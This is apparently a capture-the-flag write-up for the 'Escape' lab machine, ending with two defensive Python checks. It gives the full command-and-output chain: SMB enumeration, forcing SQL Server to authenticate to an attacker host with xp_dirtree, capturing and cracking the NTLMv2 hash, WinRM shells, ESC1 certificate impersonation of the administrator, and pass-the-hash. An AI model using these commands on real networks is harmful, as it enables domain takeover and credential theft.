Proof of Concept
10.129.8.240
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
Information Gathering
Collecting host information
┌──(kali㉿kali)-[~/Escape]
└─$ nxc smb 10.129.8.240 --generate-hosts-file hosts
SMB 10.129.8.240 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/Escape]
└─$ cat hosts
10.129.8.240 DC.sequel.htb sequel.htb DC
Configuring the /etc/hosts file
┌──(kali㉿kali)-[~/Escape]
└─$ cat /etc/hosts
<SNIP>
10.129.8.240 DC.sequel.htb sequel.htb DC
Initial Access
The guest user has read access to the Public SMB share
┌──(kali㉿kali)-[~/Escape]
└─$ nxc smb sequel.htb -u 'guest' -p '' --shares
SMB 10.129.8.240 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.8.240 445 DC [+] sequel.htb\guest:
SMB 10.129.8.240 445 DC [*] Enumerated shares
SMB 10.129.8.240 445 DC Share Permissions Remark
SMB 10.129.8.240 445 DC ----- ----------- ------
SMB 10.129.8.240 445 DC ADMIN$ Remote Admin
SMB 10.129.8.240 445 DC C$ Default share
SMB 10.129.8.240 445 DC IPC$ READ Remote IPC
SMB 10.129.8.240 445 DC NETLOGON Logon server share
SMB 10.129.8.240 445 DC Public READ
SMB 10.129.8.240 445 DC SYSVOL Logon server share
Found the file 'SQL Server Procedures.pdf' in the Public share
┌──(kali㉿kali)-[~/Escape]
└─$ smbclient //10.129.8.240/Public/ -U 'guest'
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
5184255 blocks of size 4096. 1440737 blocks available
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (26.8 KiloBytes/sec) (average 26.8 KiloBytes/sec)
smb: \>
Obtained database account credentials from the PDF file
- PublicUser:GuestUserCantWrite1
<SNIP>
Bonus
For new hired and those that are still waiting their users to be created and perms assigned, can sneak a peek at the Database with user PublicUser and password GuestUserCantWrite1.
Refer to the previous guidelines and make sure to switch the "Windows Authentication" to "SQL Server Authentication".
Successfully connected to MSSQL with the obtained account
┌──(kali㉿kali)-[~/Escape]
└─$ impacket-mssqlclient sequel.htb/publicuser:GuestUserCantWrite1@sequel.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (PublicUser guest@master)>
Started Responder on the attacker machine
┌──(kali㉿kali)-[~/Escape]
└─$ sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
<SNIP>
Made SQL Server authenticate to the attacker’s SMB share
SQL (PublicUser guest@msdb)> xp_dirtree //10.10.14.248/share
[%] exec master.sys.xp_dirtree '//10.10.14.248/share',1,1
subdirectory depth file
------------ ----- ----
Captured the NTLMv2 hash of the SQL Server service account
┌──(kali㉿kali)-[~/Escape]
└─$ sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
<SNIP>
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.8.240
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:15e399abe33f<SNIP>
Cracked the hash to obtain the plaintext password of the sql_svc account
- REGGIE1234ronnie
┌──(kali㉿kali)-[~/Escape]
└─$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --quiet
SQL_SVC::sequel:15e399abe33f0325:ce1917348a03344acefc4d6a311d9c62:<SNIP>:REGGIE1234ronnie
Successfully connected via WinRM as sql_svc
┌──(kali㉿kali)-[~/Escape]
└─$ evil-winrm -i sequel.htb -u 'sql_svc' -p 'REGGIE1234ronnie'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sql_svc\Documents>
Auth as Ryan.Cooper
Found ERRORLOG.BAK in the C:\SQLServer\Logs directory
*Evil-WinRM* PS C:\SQLServer\Logs> dir
Directory: C:\SQLServer\Logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
Found what appear to be a username and password in the contents of ERRORLOG.BAK
- Ryan.Cooper:NuclearMosquito3
*Evil-WinRM* PS C:\SQLServer\Logs> type ERRORLOG.BAK
2022-11-18 13:43:05.96 Server Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: ) (Hypervisor)
<SNIP>
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
2022-11-18 13:43:07.76 spid51 Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_sqlagent_is_starting'. This is an informational message only; no user action is required.
2022-11-18 13:43:08.24 spid51 Changed database context to 'master'.
2022-11-18 13:43:08.24 spid51 Changed language setting to us_english.
2022-11-18 13:43:09.29 spid9s SQL Server is terminating in response to a 'stop' request from Service Control Manager. This is an informational message only. No user action is required.
2022-11-18 13:43:09.31 spid9s .NET Framework runtime has been stopped.
2022-11-18 13:43:09.43 spid9s SQL Trace was stopped due to server shutdown. Trace ID = '1'. This is an informational message only; no user action is required.
Successfully connected via WinRM with the credentials just discovered
┌──(kali㉿kali)-[~/Escape]
└─$ evil-winrm -i sequel.htb -u 'Ryan.Cooper' -p 'NuclearMosquito3'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents>
Read user.txt
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> type user.txt
c4050be103c94a176e54856110e82d5b
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::b5
IPv6 Address. . . . . . . . . . . : dead:beef::91e2:5185:c939:fd03
Link-local IPv6 Address . . . . . : fe80::91e2:5185:c939:fd03%4
IPv4 Address. . . . . . . . . . . : 10.129.8.240
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%4
10.129.0.1
Privilege Escalation
Scanning for privilege escalation vulnerabilities
┌──(kali㉿kali)-[~/Escape]
└─$ certipy-ad find -u 'Ryan.Cooper' -p 'NuclearMosquito3' -dc-ip 10.129.8.240 -target-ip 10.129.8.240 -vulnerable
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sequel-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'sequel-DC-CA'
[*] Checking web enrollment for CA 'sequel-DC-CA' @ 'dc.sequel.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260216030602_Certipy.txt'
[*] Wrote text output to '20260216030602_Certipy.txt'
[*] Saving JSON output to '20260216030602_Certipy.json'
[*] Wrote JSON output to '20260216030602_Certipy.json'
Found an ESC1 vulnerability
┌──(kali㉿kali)-[~/Escape]
└─$ cat 20260216030602_Certipy.txt
<SNIP>
Certificate Templates
0
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2022-11-18T21:10:22+00:00
Template Last Modified : 2024-01-19T00:26:38+00:00
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Administrator
Full Control Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Property Enroll : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
[+] User Enrollable Principals : SEQUEL.HTB\Domain Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
Requested the certificate for the target user
┌──(kali㉿kali)-[~/Escape]
└─$ certipy-ad req \
-u 'Ryan.Cooper@sequel.htb' -p 'NuclearMosquito3' \
-dc-ip '10.129.8.240' -target 'DC.sequel.htb' \
-ca 'sequel-DC-CA' -template 'UserAuthentication' \
-upn 'administrator@sequel.htb' -sid 'S-1-5-21-4078382237-1492182817-2568127209-500'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 13
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate object SID is 'S-1-5-21-4078382237-1492182817-2568127209-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
Authenticated using the obtained certificate and obtained the administrator’s NTLM hash
┌──(kali㉿kali)-[~/Escape]
└─$ certipy-ad auth -pfx 'administrator.pfx' -dc-ip '10.129.8.240'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@sequel.htb'
[*] SAN URL SID: 'S-1-5-21-4078382237-1492182817-2568127209-500'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
Authenticated to the WinRM service using the previously obtained administrator’s NTLM hash
┌──(kali㉿kali)-[~/Escape]
└─$ evil-winrm -i sequel.htb -u 'administrator' -H 'a52f78e4c751e5f5e17e1e9f3e58f4ee'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Read root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
63de35c6d4e2acdf52dc452432181681
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::b5
IPv6 Address. . . . . . . . . . . : dead:beef::91e2:5185:c939:fd03
Link-local IPv6 Address . . . . . : fe80::91e2:5185:c939:fd03%4
IPv4 Address. . . . . . . . . . . : 10.129.8.240
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%4
10.129.0.1
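Looking back at the ERRORLOG.BAK contents in the Auth as Ryan.Cooper section: SQL Server writes the failed login name verbatim, so a password typed into the username field lands in the log in plaintext, which is exactly how the Ryan.Cooper credential was recovered. The following is an added example, not part of the original writeup, of a defender-side check that flags such entries in a log's text and redacts them before the file is copied or shipped; the known-login list, the 30-second correlation window and the sample lines are constructed assumptions.

```python
"""Added example: spot failed SQL Server logons whose 'user' is probably a leaked password."""
import re
from datetime import datetime, timedelta

# Matches the 'Logon failed for user' lines in the ERRORLOG format shown above.
LOGON_FAIL = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+Logon\s+"
    r"Logon failed for user '(?P<login>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]")

def parse_failures(log_text):
    """Yield (timestamp, login, client) for every failed-logon line."""
    for line in log_text.splitlines():
        m = LOGON_FAIL.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"), m["login"], m["client"]

def suspected_leaks(log_text, known_logins, window=timedelta(seconds=30)):
    """Return (account, leaked_value) pairs: a failure for a known account followed, from
    the same client within `window`, by a failure for a name that is neither a known login
    nor account-shaped (no backslash or '@'). That second 'user' is most likely a password
    typed into the login field, now sitting in plaintext in the log."""
    known = {k.lower() for k in known_logins}
    leaks, last_known = [], {}
    for ts, login, client in parse_failures(log_text):
        if login.lower() in known:
            last_known[client] = (ts, login)
            continue
        if "\\" in login or "@" in login:
            continue  # unknown but account-shaped: an ordinary bad logon, not a leak
        prev = last_known.get(client)
        if prev and ts - prev[0] <= window:
            leaks.append((prev[1], login))
    return leaks

def redact(log_text, known_logins):
    """Mask suspected leaked values before the log is copied or shipped elsewhere."""
    for _, secret in suspected_leaks(log_text, known_logins):
        log_text = log_text.replace(f"'{secret}'", "'<REDACTED>'")
    return log_text

# Constructed sample in the ERRORLOG layout; the real file is shown above.
SAMPLE_LOG = """\
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:08.24 spid51 Changed database context to 'master'.
"""
```

Run it as `suspected_leaks(SAMPLE_LOG, ["sequel.htb\\Ryan.Cooper"])`; a cron job that feeds the live ERRORLOG through `redact` before it is archived keeps such values out of backups like ERRORLOG.BAK.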
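The UserAuthentication template dumped in the Privilege Escalation section meets every ESC1 precondition at once: enabled, enrollee supplies the subject, a logon-capable EKU, no manager approval, zero authorized signatures, and enrollment rights for Domain Users. As an added example (neither Certipy's code nor the writeup's own), the check below evaluates a template record against those preconditions so a defender can see which single setting to change to break the chain; the Template fields and the broad-group list are assumptions modelled on the Certipy output above.

```python
"""Added example: flag the ESC1 preconditions in a certificate template record
whose fields are named after the Certipy text output shown above."""
from dataclasses import dataclass, field

# Enrollment rights for any of these groups mean effectively any domain principal can enroll.
BROAD_GROUPS = {"domain users", "authenticated users", "everyone", "domain computers"}
# EKUs that let the issued certificate be used to log on; an empty EKU list is unrestricted.
LOGON_EKUS = {"client authentication", "pkinit client authentication",
              "smart card logon", "any purpose"}

@dataclass
class Template:
    name: str
    enabled: bool
    enrollee_supplies_subject: bool
    extended_key_usage: list
    requires_manager_approval: bool
    authorized_signatures_required: int
    enrollment_rights: list = field(default_factory=list)

def esc1_conditions(t: Template) -> list:
    """Return which of the six ESC1 preconditions the template meets."""
    met = []
    if t.enabled:
        met.append("enabled")
    if t.enrollee_supplies_subject:
        met.append("enrollee supplies subject")
    ekus = {e.strip().lower() for e in t.extended_key_usage}
    if not ekus or ekus & LOGON_EKUS:
        met.append("allows client authentication")
    if not t.requires_manager_approval:
        met.append("no manager approval")
    if t.authorized_signatures_required == 0:
        met.append("no authorized signatures required")
    if {g.split("\\")[-1].lower() for g in t.enrollment_rights} & BROAD_GROUPS:
        met.append("low-privileged principals can enroll")
    return met

def is_esc1(t: Template) -> bool:
    """ESC1 needs every precondition at once; breaking any one of them remediates it."""
    return len(esc1_conditions(t)) == 6

# Constructed from the UserAuthentication template in the Certipy output above.
USER_AUTHENTICATION = Template(
    name="UserAuthentication", enabled=True, enrollee_supplies_subject=True,
    extended_key_usage=["Client Authentication", "Secure Email", "Encrypting File System"],
    requires_manager_approval=False, authorized_signatures_required=0,
    enrollment_rights=["SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Domain Users",
                       "SEQUEL.HTB\\Enterprise Admins"],
)
```

`is_esc1(USER_AUTHENTICATION)` returns True; clearing the EnrolleeSuppliesSubject flag, requiring manager approval, or removing Domain Users from the enrollment rights each drops one condition and makes it False.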